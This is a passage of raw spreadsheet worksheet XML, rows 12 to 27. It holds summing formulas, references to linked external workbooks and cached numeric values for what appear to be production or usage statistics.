        <f>'[16]4'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]4'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]4'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]4'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]4'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'3'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'3'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>63.0541073394588</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]4'!$W$68</f>
        <v>181.891891891892</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]4'!$X$68</f>
        <v>242.1</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]4'!$Y$68</f>
        <v>266.339919902951</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]4'!$T$68</f>
        <v>15.4166666666667</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]4'!$U$68</f>
        <v>10.4166666666667</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]4'!$V$68</f>
        <v>70.8275394477318</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]4'!$Q$68</f>
        <v>3.70</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]4'!$R$68</f>
        <v>10.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]4'!$S$68</f>
        <v>5745.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>2077</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'3'!H14</f>
        <v>6231</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>970774.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>7236.629</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'3'!K14</f>
        <v>21284.995</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1814229.101</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>67564.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]4'!$W$71</f>
        <v>230.232558139535</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]4'!$X$71</f>
        <v>221.546190343288</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]4'!$Y$71</f>
        <v>213.571460221105</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]4'!$T$71</f>
        <v>34.0416666666667</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]4'!$U$71</f>
        <v>37.3229166666667</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]4'!$V$71</f>
        <v>50.0780325443787</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]4'!$Q$71</f>
        <v>8.17</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]4'!$R$71</f>
        <v>35.83</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]4'!$S$71</f>
        <v>4062.33</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'3'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>581.555</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'3'!K15</f>
        <v>1055.335</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>115811.835</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]4'!$W$72</f>
        <v>66.8789808917197</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]4'!$X$72</f>
        <v>67.1595109468297</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]4'!$Y$72</f>
        <v>61.3346102391274</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]4'!$T$72</f>
        <v>39.25</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]4'!$U$72</f>
        <v>36.6354166666667</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]4'!$V$72</f>
        <v>50.5876479289941</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]4'!$Q$72</f>
        <v>9.42</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]4'!$R$72</f>
        <v>35.17</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]4'!$S$72</f>
        <v>4103.67</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'3'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'3'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]4'!$W$73</f>
        <v>70.276008492569</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]4'!$X$73</f>
        <v>67.6428774523742</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]4'!$Y$73</f>
        <v>62.9561159716215</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]4'!$T$73</f>
        <v>39.25</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]4'!$U$73</f>
        <v>36.6354166666667</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]4'!$V$73</f>
        <v>52.1619822485207</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]4'!$Q$73</f>
        <v>9.42</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]4'!$R$73</f>
        <v>35.17</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]4'!$S$73</f>
        <v>4231.38</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'3'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'3'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]4'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]4'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]4'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]4'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]4'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]4'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]4'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]4'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]4'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'3'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'3'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]4'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]4'!$X$74</f>
        <v>0</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]4'!$Y$74</f>
        <v>222.404925880448</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]4'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]4'!$U$74</f>
        <v>0</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]4'!$V$74</f>
        <v>6.9271449704142</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]4'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]4'!$R$74</f>
        <v>0</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]4'!$S$74</f>
        <v>561.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'3'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'3'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]4'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]4'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]4'!$Y$72</f>
        <v>9.10144927536232e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]4'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]4'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]4'!$V$72</f>
        <v>4.25295857988166e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]4'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]4'!$R$72</f>
        <v>4e-6</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]4'!$S$72</f>
        <v>0.000345</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'3'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'3'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]4'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]4'!$X$73</f>
        <v>1e-5</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]4'!$Y$73</f>
        <v>239.29985790439</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]4'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]4'!$U$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]4'!$V$73</f>
        <v>71.2737961661736</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]4'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]4'!$R$73</f>
        <v>4e-6</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]4'!$S$73</f>
        <v>5781.730345</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]4'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]4'!$E$22</f>
        <v>6243</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'3'!H21</f>
        <v>23736</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2133174</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]4'!$I$22</f>
        <v>8287.96</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'3'!K21</f>
        <v>31253.06</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2097707.06</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]4'!$L$22</f>
        <v>75536.25</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>160.715425531915</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]4'!$W$81</f>
        <v>277.939393939394</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]4'!$X$81</f>
        <v>276.851169700117</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]4'!$Y$81</f>
        <v>275.698980939811</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]4'!$T$81</f>
        <v>68.75</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]4'!$U$81</f>
        <v>47.916087962963</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]4'!$V$81</f>
        <v>36.2643340455841</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]4'!$Q$81</f>
        <v>16.5</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]4'!$R$81</f>
        <v>45.9994444444444</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]4'!$S$81</f>
        <v>2941.76277777778</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]4'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]4'!$E$17</f>
        <v>6539</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'3'!H22</f>
        <v>26233</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2057214</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]4'!$I$17</f>
        <v>6155.91</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'3'!K22</f>
        <v>23966.94</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1915428.32</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]4'!$L$17</f>
        <v>192232.412</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>96.116206</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]4'!$W$79</f>
        <v>104.414165191842</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]4'!$X$79</f>
        <v>105.019773026864</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]4'!$Y$79</f>
        <v>102.301167460769</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]4'!$T$79</f>
        <v>67.3599537037037</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]4'!$U$79</f>
        <v>57.2907986111111</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]4'!$V$79</f>
        <v>45.5196998959018</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]4'!$Q$79</f>
        <v>16.1663888888889</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]4'!$R$79</f>
        <v>54.9991666666667</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]4'!$S$79</f>
        <v>3692.55805555556</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]4'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]4'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'3'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]4'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'3'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]4'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]4'!$W$80</f>
        <v>88.9499692973479</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]4'!$X$80</f>
        <v>80.2029203470297</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]4'!$Y$80</f>
        <v>79.1476565924828</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]4'!$T$80</f>
        <v>39.5821759259259</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]4'!$U$80</f>
        <v>51.5619212962963</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]4'!$V$80</f>
        <v>32.7213421816787</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]4'!$Q$80</f>
        <v>9.49972222222222</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]4'!$R$80</f>
        <v>49.4994444444444</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]4'!$S$80</f>
        <v>2654.35527777778</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]4'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]4'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'3'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]4'!$I$56</f>
        <v>1313.91</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'3'!K24</f>
        <v>6686.16</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>286512.69</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]4'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]4'!$R$6</f>
        <v>76.375</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]4'!$S$6</f>
        <v>82.1904761904762</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]4'!$T$6</f>
        <v>86.1118306714833</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]4'!$O$6</f>
        <v>100</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]4'!$P$6</f>
        <v>54.6875</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]4'!$Q$6</f>
        <v>52.3473865877712</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]4'!$L$6</f>
        <v>24</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]4'!$M$6</f>
        <v>52.5</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]4'!$N$6</f>
        <v>4246.42</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]4'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'3'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]4'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'3'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]4'!$R$7</f>
        <v>201.770491803279</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]4'!$S$7</f>
        <v>199.09756097561</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]4'!$T$7</f>
        <v>187.687703945782</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]4'!$O$7</f>
        <v>63.5416666666667</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]4'!$P$7</f>
        <v>42.7083333333333</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]4'!$Q$7</f>
        <v>50.0934418145957</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]4'!$L$7</f>
        <v>15.25</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]4'!$M$7</f>
        <v>41</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]4'!$N$7</f>
        <v>4063.58</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'3'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'3'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]4'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]4'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]4'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]4'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]4'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]4'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]4'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]4'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]4'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'3'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
